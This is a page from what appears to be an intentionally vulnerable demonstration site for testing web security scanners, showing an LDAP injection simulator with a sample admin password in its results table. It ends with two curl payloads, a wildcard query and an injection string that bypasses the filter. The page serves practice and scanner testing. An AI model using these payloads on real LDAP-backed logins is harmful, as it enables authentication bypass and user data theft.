Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

LDAP Injection Simulator

LDAP Search Filter

Filter: (|(uid=admin)(cn=admin))

LDAP Search Results

UIDCNEmailPassword
adminadminadmin@acunetix.comsecret@123

LDAP AUTHENTICATION SUCCESSFUL!

LDAP Injection Tests

Username: Password:

Injection Payloads

curl Test

# LDAP wildcard — get all users
curl "http://localhost/ldap.php?username=*"

# LDAP injection bypass
curl "http://localhost/ldap.php?username=*)(uid=*))(|(uid=*"